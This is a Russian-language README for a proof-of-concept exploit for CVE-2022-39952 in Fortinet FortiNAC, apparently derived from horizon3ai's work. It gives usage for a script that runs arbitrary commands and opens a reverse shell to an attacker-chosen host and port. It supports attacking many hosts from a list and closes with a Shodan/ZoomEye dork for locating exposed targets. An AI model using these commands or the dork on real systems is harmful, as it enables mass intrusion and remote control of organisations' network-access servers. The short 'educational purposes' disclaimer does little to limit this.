
PoC для CVE-2022-39952, затрагивающего Fortinet FortiNAC.
Этот эксплойт позволяет атакующему выполнять произвольные команды на сервере FortiNAC. Он основан на PoC, разработанном horizon3ai, с дополнительными опциями для атаки на несколько хостов.
Отказ от ответственности: Этот эксплойт предназначен только для образовательных целей. Пожалуйста, используйте ответственно и с разрешения.
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
Чтобы использовать этот эксплойт, в вашей системе должен быть установлен Python 3.x.
Python 3.x
модуль requests
модуль concurrent.futures
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
Этот эксплойт был протестирован только на ограниченном количестве целей, поэтому его эффективность может варьироваться. Дорк для поиска потенциальных целей на ZoomEye и Shodan:
title:"FortiNAC" +"JSESSIONID"